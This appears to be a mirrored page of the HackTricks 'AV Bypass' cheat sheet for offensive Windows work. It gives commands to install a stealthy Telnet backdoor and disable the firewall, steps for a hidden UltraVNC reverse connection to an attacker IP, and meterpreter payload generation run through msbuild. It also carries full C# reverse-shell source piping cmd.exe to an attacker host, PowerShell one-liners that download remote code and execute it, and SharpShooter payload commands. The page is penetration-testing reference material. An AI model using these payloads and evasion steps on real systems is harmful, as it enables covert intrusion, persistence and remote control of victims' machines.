mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 05:03:35 +00:00
da9f0ae517
- Clarify download link - Clarify that you need to run winvnc on the attacking machine to generate UltraVnc.ini - Add warnings on ways you can mess up stealth
246 lines
8.5 KiB
Markdown
246 lines
8.5 KiB
Markdown
# AV Bypass
|
|
|
|
## **Telnet Server**
|
|
|
|
Until Windows10, all Windows came with a **Telnet server** that you could install (as administrator) doing:
|
|
|
|
```
|
|
pkgmgr /iu:"TelnetServer" /quiet
|
|
```
|
|
|
|
Make it **start** when the system is started and **run** it now:
|
|
|
|
```
|
|
sc config TlntSVR start= auto obj= localsystem
|
|
```
|
|
|
|
**Change telnet port** (stealth) and disable firewall:
|
|
|
|
```
|
|
tlntadmn config port=80
|
|
netsh advfirewall set allprofiles state off
|
|
```
|
|
|
|
## UltraVNC
|
|
|
|
Download it from: [http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.com/downloads/ultravnc.html) (you want the bin downloads, not the setup)
|
|
|
|
**ON THE HOST**: Execute _**winvnc.exe**_ and configure the server:
|
|
|
|
* Enable the option _Disable TrayIcon_
|
|
* Set a password in _VNC Password_
|
|
* Set a password in _View-Only Password_
|
|
|
|
Then, move the binary _**winvnc.exe**_ and **newly** created file _**UltraVNC.ini**_ inside the **victim**
|
|
|
|
### **Reverse connection**
|
|
|
|
The **attacker** should **execute inside** his **host** the binary `vncviewer.exe -listen 5900` so it will be **prepared** to catch a reverse **VNC connection**.
|
|
Then, inside the **victim**: Start the winvnc daemon `winvnc.exe -run` and run `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900`
|
|
|
|
**WARNING:** To maintain stealth you must not do a few things
|
|
- Don't start `winvnc` if it's already running or you'll trigger a [popup](https://i.imgur.com/1SROTTl.png). check if it's running with `tasklist | findstr winvnc`
|
|
- Don't start `winvnc` without `UltraVNC.ini` in the same directory or it will cause [the config window](https://i.imgur.com/rfMQWcf.png) to open
|
|
- Don't run `winvnc -h` for help or you'll trigger a [popup](https://i.imgur.com/oc18wcu.png)
|
|
|
|
## GreatSCT
|
|
|
|
Download it from: [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
|
|
|
|
```
|
|
git clone https://github.com/GreatSCT/GreatSCT.git
|
|
cd GreatSCT/setup/
|
|
./setup.sh
|
|
cd ..
|
|
./GreatSCT.py
|
|
```
|
|
|
|
Inside GreatSCT:
|
|
|
|
```
|
|
use 1
|
|
list #Listing available payloads
|
|
use 9 #rev_tcp.py
|
|
set lhost 10.10.14.0
|
|
sel lport 4444
|
|
generate #payload is the default name
|
|
#This will generate a meterpreter xml and a rcc file for msfconsole
|
|
```
|
|
|
|
Now **start the lister** with `msfconsole -r file.rc` and **execute** the **xml payload** with:
|
|
|
|
```
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
|
|
```
|
|
|
|
**Current defender will terminate the process very fast.**
|
|
|
|
## Compiling our own reverse shell
|
|
|
|
 https://medium.com/@Bank\_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
|
|
|
|
#### First C# Revershell
|
|
|
|
Compile it with:
|
|
|
|
```
|
|
c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
|
|
```
|
|
|
|
Use it with:
|
|
|
|
```
|
|
back.exe <ATTACKER_IP> <PORT>
|
|
```
|
|
|
|
```
|
|
using System;
|
|
using System.Text;
|
|
using System.IO;
|
|
using System.Diagnostics;
|
|
using System.ComponentModel;
|
|
using System.Linq;
|
|
using System.Net;
|
|
using System.Net.Sockets;
|
|
|
|
|
|
namespace ConnectBack
|
|
{
|
|
public class Program
|
|
{
|
|
static StreamWriter streamWriter;
|
|
|
|
public static void Main(string[] args)
|
|
{
|
|
using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
|
|
{
|
|
using(Stream stream = client.GetStream())
|
|
{
|
|
using(StreamReader rdr = new StreamReader(stream))
|
|
{
|
|
streamWriter = new StreamWriter(stream);
|
|
|
|
StringBuilder strInput = new StringBuilder();
|
|
|
|
Process p = new Process();
|
|
p.StartInfo.FileName = "cmd.exe";
|
|
p.StartInfo.CreateNoWindow = true;
|
|
p.StartInfo.UseShellExecute = false;
|
|
p.StartInfo.RedirectStandardOutput = true;
|
|
p.StartInfo.RedirectStandardInput = true;
|
|
p.StartInfo.RedirectStandardError = true;
|
|
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
|
|
p.Start();
|
|
p.BeginOutputReadLine();
|
|
|
|
while(true)
|
|
{
|
|
strInput.Append(rdr.ReadLine());
|
|
//strInput.Append("\n");
|
|
p.StandardInput.WriteLine(strInput);
|
|
strInput.Remove(0, strInput.Length);
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
|
|
{
|
|
StringBuilder strOutput = new StringBuilder();
|
|
|
|
if (!String.IsNullOrEmpty(outLine.Data))
|
|
{
|
|
try
|
|
{
|
|
strOutput.Append(outLine.Data);
|
|
streamWriter.WriteLine(strOutput);
|
|
streamWriter.Flush();
|
|
}
|
|
catch (Exception err) { }
|
|
}
|
|
}
|
|
|
|
}
|
|
}
|
|
```
|
|
|
|
[https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple\_Rev\_Shell.cs](https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple\_Rev\_Shell.cs)
|
|
|
|
## C# using compiler
|
|
|
|
```
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
|
|
```
|
|
|
|
[REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066](https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066)
|
|
|
|
[REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639](https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639)
|
|
|
|
Automatic download and execution:
|
|
|
|
```
|
|
64bit:
|
|
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
|
|
|
|
32bit:
|
|
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
|
|
```
|
|
|
|
{% embed url="https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f" %}
|
|
|
|
C# obfuscators list: [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator)
|
|
|
|
## C++
|
|
|
|
```
|
|
sudo apt-get install mingw-w64
|
|
|
|
i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
|
|
```
|
|
|
|
[https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp](https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp)
|
|
|
|
Merlin, Empire, Puppy, SalsaTools https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/
|
|
|
|
[https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf](https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf)
|
|
|
|
https://github.com/l0ss/Grouper2
|
|
|
|
{% embed url="http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html" %}
|
|
|
|
{% embed url="http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/" %}
|
|
|
|
## Other tools
|
|
|
|
```bash
|
|
# Veil Framework:
|
|
https://github.com/Veil-Framework/Veil
|
|
|
|
# Shellter
|
|
https://www.shellterproject.com/download/
|
|
|
|
# Sharpshooter
|
|
# https://github.com/mdsecactivebreach/SharpShooter
|
|
# Javascript Payload Stageless:
|
|
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
|
|
|
|
# Stageless HTA Payload:
|
|
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
|
|
|
|
# Staged VBS:
|
|
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
|
|
|
|
# Donut:
|
|
https://github.com/TheWover/donut
|
|
|
|
# Vulcan
|
|
https://github.com/praetorian-code/vulcan
|
|
```
|
|
|
|
## More
|
|
|
|
{% embed url="https://github.com/EgeBalci/sgn" %}
|
|
|
|
{% embed url="https://github.com/persianhydra/Xeexe-TopAntivirusEvasion" %}
|
|
|